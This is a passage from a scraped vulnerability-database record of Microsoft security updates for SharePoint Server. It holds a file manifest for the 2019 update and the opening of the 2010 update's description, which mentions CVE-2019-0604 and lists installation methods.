1185607</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>jsgrid.gantt.debug.js</td><td>jsgrid.gantt.debug.js</td><td>\u00a0</td><td>110109</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>jsgrid.gantt.js</td><td>jsgrid.gantt.js</td><td>\u00a0</td><td>42306</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>jsgrid.js</td><td>jsgrid.js</td><td>\u00a0</td><td>444681</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>languagepickercontrol.js</td><td>languagepickercontrol.js</td><td>\u00a0</td><td>11518</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>listview.debug.js</td><td>listview.debug.js</td><td>\u00a0</td><td>930411</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>listview.js</td><td>listview.js</td><td>\u00a0</td><td>399999</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>mapviewtemplate.debug.js</td><td>mapviewtemplate.debug.js</td><td>\u00a0</td><td>38394</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>mapviewtemplate.js</td><td>mapviewtemplate.js</td><td>\u00a0</td><td>15544</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>menu.debug.js</td><td>menu.debug.js</td><td>\u00a0</td><td>103516</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>menu.js_0001</td><td>menu.js</td><td>\u00a0</td><td>52561</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>mountpt.debug.js</td><td>mountpoint.debug.js</td><td>\u00a0</td><td>13632</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>mountpt.js</td><td>mountpoint.js</td><td>\u00a0</td><td>6213</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>mquery.debug.js</td><td>mquery.debug.js</td><td>\u00a0</td><td>60340</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>mquery.js</td><td>mquery.js</td><td>\u00a0</td><td>22616</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>ms.rte.debug.js</td><td>ms.rte.debug.js</td><td>\u00a0</td><td>714303</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>ms.rte.js</td><td>ms.rte.js</td><td>\u00a0</td><td>401121</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>offline.debug.js</td><td>offline.debug.js</td><td>\u00a0</td><td>22145</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>offline.js</td><td>offline.js</td><td>\u00a0</td><td>11376</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>ows.debug.js</td><td>ows.debug.js</td><td>\u00a0</td><td>714258</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>ows.js</td><td>ows.js</td><td>\u00a0</td><td>376947</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>owsbrows.debug.js</td><td>owsbrows.debug.js</td><td>\u00a0</td><td>24730</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>owsbrows.js</td><td>owsbrows.js</td><td>\u00a0</td><td>13193</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>pickerhierarchycontrol.js</td><td>pickerhierarchycontrol.js</td><td>\u00a0</td><td>84678</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>quicklaunch.debug.js</td><td>quicklaunch.debug.js</td><td>\u00a0</td><td>135522</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>quicklaunch.js</td><td>quicklaunch.js</td><td>\u00a0</td><td>74050</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>radiobuttonwithchildren.js</td><td>radiobuttonwithchildren.js</td><td>\u00a0</td><td>3557</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>roamingapps.debug.js</td><td>roamingapps.debug.js</td><td>\u00a0</td><td>55031</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>roamingapps.js</td><td>roamingapps.js</td><td>\u00a0</td><td>21855</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sharing.debug.js</td><td>sharing.debug.js</td><td>\u00a0</td><td>322361</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sharing.js</td><td>sharing.js</td><td>\u00a0</td><td>135350</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sharingmodern.debug.js</td><td>sharingmodern.debug.js</td><td>\u00a0</td><td>18196</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sharingmodern.js</td><td>sharingmodern.js</td><td>\u00a0</td><td>5807</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>singlesignon.debug.js</td><td>singlesignon.debug.js</td><td>\u00a0</td><td>17059</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>singlesignon.js</td><td>singlesignon.js</td><td>\u00a0</td><td>6062</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>siteupgrade.debug.js</td><td>siteupgrade.debug.js</td><td>\u00a0</td><td>1693</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>siteupgrade.debug.js_14</td><td>siteupgrade.debug.js</td><td>\u00a0</td><td>1693</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>siteupgrade.js</td><td>siteupgrade.js</td><td>\u00a0</td><td>1121</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>siteupgrade.js_14</td><td>siteupgrade.js</td><td>\u00a0</td><td>1121</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>sp.accessibility.debug.js</td><td>sp.accessibility.debug.js</td><td>\u00a0</td><td>34811</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.accessibility.js</td><td>sp.accessibility.js</td><td>\u00a0</td><td>21843</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.core.debug.js</td><td>sp.core.debug.js</td><td>\u00a0</td><td>165966</td><td>4-Mar-19</td><td>09:23</td></tr><tr><td>sp.core.js</td><td>sp.core.js</td><td>\u00a0</td><td>87863</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.datetimeutil.debug.js</td><td>sp.datetimeutil.debug.js</td><td>\u00a0</td><td>114089</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.datetimeutil.js</td><td>sp.datetimeutil.js</td><td>\u00a0</td><td>65780</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.debug.js</td><td>sp.debug.js</td><td>\u00a0</td><td>1706283</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.exp.debug.js</td><td>sp.exp.debug.js</td><td>\u00a0</td><td>41182</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>sp.exp.js</td><td>sp.exp.js</td><td>\u00a0</td><td>24500</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.init.debug.js</td><td>sp.init.debug.js</td><td>\u00a0</td><td>57831</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.init.js</td><td>sp.init.js</td><td>\u00a0</td><td>32954</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.js</td><td>sp.js</td><td>\u00a0</td><td>1044863</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spmap.debug.js</td><td>sp.map.debug.js</td><td>\u00a0</td><td>15759</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spmap.js</td><td>sp.map.js</td><td>\u00a0</td><td>8533</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sppageinstr.debug.js</td><td>sp.pageinstrumentation.debug.js</td><td>\u00a0</td><td>1925</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sppageinstr.js</td><td>sp.pageinstrumentation.js</td><td>\u00a0</td><td>1397</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.requestexecutor.debug.js</td><td>sp.requestexecutor.debug.js</td><td>\u00a0</td><td>100405</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.requestexecutor.js</td><td>sp.requestexecutor.js</td><td>\u00a0</td><td>63698</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ribbon.debug.js</td><td>sp.ribbon.debug.js</td><td>\u00a0</td><td>361474</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ribbon.js</td><td>sp.ribbon.js</td><td>\u00a0</td><td>222919</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>sp.runtime.debug.js</td><td>sp.runtime.debug.js</td><td>\u00a0</td><td>197022</td><td>4-Mar-19</td><td>09:24</td></tr><tr><td>sp.runtime.js</td><td>sp.runtime.js</td><td>\u00a0</td><td>115686</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.simpleloggermobile.debug.js</td><td>sp.simpleloggermobile.debug.js</td><td>\u00a0</td><td>40931</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.simpleloggermobile.js</td><td>sp.simpleloggermobile.js</td><td>\u00a0</td><td>20444</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.storefront.debug.js</td><td>sp.storefront.debug.js</td><td>\u00a0</td><td>440500</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.storefront.js</td><td>sp.storefront.js</td><td>\u00a0</td><td>296738</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.admin.debug.js</td><td>sp.ui.admin.debug.js</td><td>\u00a0</td><td>18904</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.admin.js</td><td>sp.ui.admin.js</td><td>\u00a0</td><td>11613</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.allapps.debug.js</td><td>sp.ui.allapps.debug.js</td><td>\u00a0</td><td>45304</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.allapps.js</td><td>sp.ui.allapps.js</td><td>\u00a0</td><td>27974</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.applicationpages.calendar.debug.js</td><td>sp.ui.applicationpages.calendar.debug.js</td><td>\u00a0</td><td>278348</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.applicationpages.calendar.js</td><td>sp.ui.applicationpages.calendar.js</td><td>\u00a0</td><td>143409</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.applicationpages.debug.js</td><td>sp.ui.applicationpages.debug.js</td><td>\u00a0</td><td>11283</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.applicationpages.js</td><td>sp.ui.applicationpages.js</td><td>\u00a0</td><td>7684</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>sp.ui.bdcadminpages.debug.js</td><td>sp.ui.bdcadminpages.debug.js</td><td>\u00a0</td><td>16634</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.bdcadminpages.js</td><td>sp.ui.bdcadminpages.js</td><td>\u00a0</td><td>11652</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spblogd.js</td><td>sp.ui.blogs.debug.js</td><td>\u00a0</td><td>51882</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spblog.js</td><td>sp.ui.blogs.js</td><td>\u00a0</td><td>31204</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.combobox.debug.js</td><td>sp.ui.combobox.debug.js</td><td>\u00a0</td><td>100153</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.combobox.js</td><td>sp.ui.combobox.js</td><td>\u00a0</td><td>52058</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.controls.debug.js</td><td>sp.ui.controls.debug.js</td><td>\u00a0</td><td>58556</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.controls.js</td><td>sp.ui.controls.js</td><td>\u00a0</td><td>39729</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.dialog.debug.js</td><td>sp.ui.dialog.debug.js</td><td>\u00a0</td><td>75579</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.dialog.js</td><td>sp.ui.dialog.js</td><td>\u00a0</td><td>44114</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spdiscd.js</td><td>sp.ui.discussions.debug.js</td><td>\u00a0</td><td>136669</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spdisc.js</td><td>sp.ui.discussions.js</td><td>\u00a0</td><td>81747</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spimgcd.js</td><td>sp.ui.imagecrop.debug.js</td><td>\u00a0</td><td>28399</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spimgc.js</td><td>sp.ui.imagecrop.js</td><td>\u00a0</td><td>28399</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spui_rid.js</td><td>sp.ui.relateditems.debug.js</td><td>\u00a0</td><td>29224</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spui_ri.js</td><td>sp.ui.relateditems.js</td><td>\u00a0</td><td>18378</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.rte.debug.js</td><td>sp.ui.rte.debug.js</td><td>\u00a0</td><td>355959</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.rte.js</td><td>sp.ui.rte.js</td><td>\u00a0</td><td>217946</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.tileview.debug.js</td><td>sp.ui.tileview.debug.js</td><td>\u00a0</td><td>100921</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sp.ui.tileview.js</td><td>sp.ui.tileview.js</td><td>\u00a0</td><td>61802</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spui_tld.js</td><td>sp.ui.timeline.debug.js</td><td>\u00a0</td><td>488181</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spui_tl.js</td><td>sp.ui.timeline.js</td><td>\u00a0</td><td>265639</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spgantt.debug.js</td><td>spgantt.debug.js</td><td>\u00a0</td><td>192623</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>spgantt.js</td><td>spgantt.js</td><td>\u00a0</td><td>69727</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spgridview.debug.js</td><td>spgridview.debug.js</td><td>\u00a0</td><td>7876</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>spgridvw.js</td><td>spgridview.js</td><td>\u00a0</td><td>4903</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>start.debug.js</td><td>start.debug.js</td><td>\u00a0</td><td>185210</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>start.js</td><td>start.js</td><td>\u00a0</td><td>101324</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>suitelinks.debug.js</td><td>suitelinks.debug.js</td><td>\u00a0</td><td>32319</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>suitelnk.js</td><td>suitelinks.js</td><td>\u00a0</td><td>13508</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>timecard.debug.js</td><td>timecard.debug.js</td><td>\u00a0</td><td>37455</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>timecard.js</td><td>timecard.js</td><td>\u00a0</td><td>21192</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>wpadder.debug.js</td><td>wpadder.debug.js</td><td>\u00a0</td><td>52865</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>wpadder.js</td><td>wpadder.js</td><td>\u00a0</td><td>33270</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>wpcm.debug.js</td><td>wpcm.debug.js</td><td>\u00a0</td><td>7521</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>wpcm.js</td><td>wpcm.js</td><td>\u00a0</td><td>3849</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>store.sql</td><td>store.sql</td><td>\u00a0</td><td>8073262</td><td>15-Feb-19</td><td>10:41</td></tr><tr><td>store.xml</td><td>store.xml</td><td>\u00a0</td><td>8915732</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>storeazure.xml</td><td>store_azure.xml</td><td>\u00a0</td><td>8915732</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>appassoc.asx</td><td>applicationassociations.aspx</td><td>\u00a0</td><td>5504</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>authen.asx</td><td>authentication.aspx</td><td>\u00a0</td><td>13965</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>blkftyp.asx</td><td>blockedfiletype.aspx</td><td>\u00a0</td><td>4282</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>dftcntdb.asx</td><td>defaultcontentdb.aspx</td><td>\u00a0</td><td>6243</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>healrepo.asx</td><td>healthreport.aspx</td><td>\u00a0</td><td>6499</td><td>13-Feb-19</td><td>02:12</td></tr><tr><td>incemail.asx</td><td>incomingemail.aspx</td><td>\u00a0</td><td>22663</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>irmadmin.asx</td><td>irmadmin.aspx</td><td>\u00a0</td><td>8804</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>logusage.asx</td><td>logusage.aspx</td><td>\u00a0</td><td>14555</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>metrics.asx</td><td>metrics.aspx</td><td>\u00a0</td><td>15403</td><td>13-Feb-19</td><td>11:32</td></tr><tr><td>ofadmin.asx</td><td>officialfileadmin.aspx</td><td>\u00a0</td><td>13839</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>privacy.asx</td><td>privacy.aspx</td><td>\u00a0</td><td>10182</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>slctcfaz.asx</td><td>selectcrossfirewallaccesszone.aspx</td><td>\u00a0</td><td>5643</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>svcappcn.asx</td><td>serviceapplicationconnect.aspx</td><td>\u00a0</td><td>5027</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>siteex.asx</td><td>siteandlistexport.aspx</td><td>\u00a0</td><td>12538</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>sitebaks.asx</td><td>sitebackuporexportstatus.aspx</td><td>\u00a0</td><td>10389</td><td>13-Feb-19</td><td>11:32</td></tr><tr><td>sitecbac.asx</td><td>sitecollectionbackup.aspx</td><td>\u00a0</td><td>10764</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>sitequot.asx</td><td>sitequota.aspx</td><td>\u00a0</td><td>24455</td><td>13-Feb-19</td><td>11:32</td></tr><tr><td>spscrstg.asx_0002</td><td>spsecuritysettings.aspx</td><td>\u00a0</td><td>7731</td><td>13-Feb-19</td><td>02:11</td></tr><tr><td>unatcdb.asx</td><td>unattacheddbselect.aspx</td><td>\u00a0</td><td>6322</td><td>13-Feb-19</td><td>11:32</td></tr><tr><td>user_solution.asx</td><td>usersolutions.aspx</td><td>\u00a0</td><td>9571</td><td>13-Feb-19</td><td>11:33</td></tr><tr><td>versions.asx</td><td>versions.aspx</td><td>\u00a0</td><td>37378</td><td>13-Feb-19</td><td>11:30</td></tr><tr><td>ofadmin.aspx_tenantadmin</td><td>ta_officialfileadmin.aspx</td><td>\u00a0</td><td>11593</td><td>13-Feb-19</td><td>11:23</td></tr><tr><td>owstimer.exe_0001</td><td>owstimer.exe</td><td>16.0.10342.12113</td><td>86640</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.vroom.sharepoint.dll</td><td>microsoft.vroom.sharepoint.dll</td><td>16.0.10342.12113</td><td>631952</td><td>4-Mar-19</td><td>09:21</td></tr><tr><td>spwriter.exe_0001</td><td>spwriter.exe</td><td>16.0.10342.12113</td><td>58208</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>stswel.dll</td><td>stswel.dll</td><td>16.0.10342.12113</td><td>3684496</td><td>4-Mar-19</td><td>09:33</td></tr><tr><td>stswfacb.dll</td><td>microsoft.sharepoint.workflowactions.dll</td><td>16.0.10342.12113</td><td>320888</td><td>4-Mar-19</td><td>09:45</td></tr><tr><td>stswfact.dll</td><td>microsoft.sharepoint.workflowactions.dll</td><td>16.0.10342.12113</td><td>320888</td><td>4-Mar-19</td><td>09:45</td></tr><tr><td>sts.workflows.dll</td><td>microsoft.sharepoint.workflows.dll</td><td>16.0.10342.12113</td><td>74088</td><td>4-Mar-19</td><td>09:34</td></tr><tr><td>ie50up.debug.js</td><td>ie50up.debug.js</td><td>\u00a0</td><td>155104</td><td>4-Mar-19</td><td>09:34</td></tr><tr><td>ie50up.js</td><td>ie50up.js</td><td>\u00a0</td><td>81715</td><td>4-Mar-19</td><td>09:33</td></tr><tr><td>ie55up.debug.js</td><td>ie55up.debug.js</td><td>\u00a0</td><td>154298</td><td>4-Mar-19</td><td>09:33</td></tr><tr><td>ie55up.js</td><td>ie55up.js</td><td>\u00a0</td><td>81176</td><td>4-Mar-19</td><td>09:33</td></tr><tr><td>non_ie.debug.js</td><td>non_ie.debug.js</td><td>\u00a0</td><td>102961</td><td>4-Mar-19</td><td>09:34</td></tr><tr><td>non_ie.js</td><td>non_ie.js</td><td>\u00a0</td><td>60388</td><td>4-Mar-19</td><td>09:33</td></tr><tr><td>bpstd.debug.js</td><td>bpstd.debug.js</td><td>\u00a0</td><td>8194</td><td>4-Mar-19</td><td>09:26</td></tr><tr><td>bpstd.js</td><td>bpstd.js</td><td>\u00a0</td><td>4668</td><td>4-Mar-19</td><td>09:24</td></tr><tr><td>ctp.debug.js</td><td>ctp.debug.js</td><td>\u00a0</td><td>7940</td><td>4-Mar-19</td><td>09:25</td></tr><tr><td>ctp.js</td><td>ctp.js</td><td>\u00a0</td><td>4223</td><td>4-Mar-19</td><td>09:26</td></tr><tr><td>cvtp.debug.js</td><td>cvtp.debug.js</td><td>\u00a0</td><td>5066</td><td>4-Mar-19</td><td>09:25</td></tr><tr><td>cvtp.js</td><td>cvtp.js</td><td>\u00a0</td><td>2704</td><td>4-Mar-19</td><td>09:23</td></tr><tr><td>itp.debug.js</td><td>itp.debug.js</td><td>\u00a0</td><td>13120</td><td>4-Mar-19</td><td>09:23</td></tr><tr><td>itp.js</td><td>itp.js</td><td>\u00a0</td><td>9814</td><td>4-Mar-19</td><td>09:24</td></tr><tr><td>xtp.debug.js</td><td>xtp.debug.js</td><td>\u00a0</td><td>3605</td><td>4-Mar-19</td><td>09:25</td></tr><tr><td>xtp.js</td><td>xtp.js</td><td>\u00a0</td><td>1801</td><td>4-Mar-19</td><td>09:24</td></tr><tr><td>osrv_sandbox.dll</td><td>microsoft.office.server.sandbox.dll</td><td>16.0.10342.12113</td><td>769200</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>microsoft.office.web.sandbox.dll</td><td>microsoft.office.web.sandbox.dll</td><td>16.0.10342.12113</td><td>769408</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>sts_sandbox.dll</td><td>microsoft.sharepoint.sandbox.dll</td><td>16.0.10342.12113</td><td>769408</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>visfilt.dll.x64</td><td>visfilt.dll</td><td>16.0.10342.12113</td><td>6398088</td><td>4-Mar-19</td><td>09:34</td></tr><tr><td>visioserver.vutils.dll</td><td>vutils.dll</td><td>16.0.10342.12113</td><td>3238488</td><td>4-Mar-19</td><td>09:28</td></tr><tr><td>sts_odspnextnewux1efa61166de43c71668b949c99f0686b</td><td>listitemformdeferred.js</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>sts_odspnextnewuxbe3313501487c79fe05e26c262deaaa9</td><td>createsite.json</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>sts_odspnextnewux73bf67ca708ed0b9bbee05da7d4ab95b</td><td>listitemform.json</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>odbonedrive.json</td><td>odbonedrive.json</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>sts_odspnextnewux0caa67c96a8a488d88a0b64e58cf6219</td><td>recyclebin.json</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>sts_odspnextnewux82ec74261e20424f9653d60d8846afce</td><td>sitehub.json</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>sts_odspnextnewuxc2feb86763199de55a499729d395cb83</td><td>splist.json</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>sts_odspnextnewux8c0380eb9a20542616b7c1feeac0f995</td><td>odbonedrive.js</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:38</td></tr><tr><td>sts_odspnextnewuxee5697f761f94ca16ffd86a4ef02d1a8</td><td>recyclebindeferred.js</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:39</td></tr><tr><td>sts_odspnextnewuxb8931dbbdb97beb330defb6bad1ae332</td><td>sitehubdeferred.js</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:39</td></tr><tr><td>sts_odspnextnewux75199cdb9d900d5ff11f7782399cb17f</td><td>splistdeferred.js</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:39</td></tr><tr><td>sts_odspnextnewux30484b0717864b439efabcb4caaf6538</td><td>spoapp.js</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:39</td></tr><tr><td>sts_odspnextnewuxb680d3a8e2013810dae29dafe4d75340</td><td>spofiles.js</td><td>\u00a0</td><td>\u00a0</td><td>13-Feb-19</td><td>07:39</td></tr><tr><td>cui.debug.js</td><td>cui.debug.js</td><td>\u00a0</td><td>657986</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>cui.js</td><td>cui.js</td><td>\u00a0</td><td>364466</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>xui.debug.js</td><td>xui.debug.js</td><td>\u00a0</td><td>45549</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>xui.js</td><td>xui.js</td><td>\u00a0</td><td>18954</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>wac.word.sword.dll</td><td>sword.dll</td><td>16.0.10342.12113</td><td>12804928</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wdsrv.conversion.sword.dll</td><td>sword.dll</td><td>16.0.10342.12113</td><td>12804928</td><td>4-Mar-19</td><td>09:36</td></tr><tr><td>translationqueue.sql</td><td>translationqueue.sql</td><td>\u00a0</td><td>53164</td><td>4-Mar-19</td><td>09:20</td></tr><tr><td>ifswfe.dll</td><td>microsoft.office.infopath.server.dll</td><td>16.0.10342.12113</td><td>3183728</td><td>4-Mar-19</td><td>09:31</td></tr><tr><td>ifswfepriv.dll</td><td>microsoft.office.infopath.server.dll</td><td>16.0.10342.12113</td><td>3183728</td><td>4-Mar-19</td><td>09:31</td></tr><tr><td>offxml.dll</td><td>offxml.dll</td><td>16.0.10342.12113</td><td>427648</td><td>4-Mar-19</td><td>09:44</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://www.microsoft.com/safety/pc-security/updates.aspx\" managed-link=\"\" target=\"_blank\">Protect yourself online</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Security</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></p></body></html>", "modified": "2019-11-15T22:41:06", "id": "KB4462199", "href": "https://support.microsoft.com/en-us/help/4462199/", "published": "2019-11-15T22:38:41", "title": "Description of the security update for SharePoint Server 2019: March 12, 2019", "type": "mskb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-14T00:45:36", "bulletinFamily": "microsoft", "description": "<html><body><p>Provides information about the SharePoint Server 2010 security update 4462184 that was released on March 12, 2019.</p><h2>Summary</h2><div><p>This security update resolves a remote code execution vulnerability that exists in Microsoft SharePoint if the software does not check the source markup of an application package.\u00a0To learn more about the\u00a0vulnerability, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604\" managed-link=\"\" target=\"_blank\">Microsoft Common Vulnerabilities and Exposures CVE-2019-0604</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/2687453\" managed-link=\"\" target=\"_blank\">Service Pack 2 for Microsoft SharePoint Server 2010</a> installed on the computer.</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462184\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" 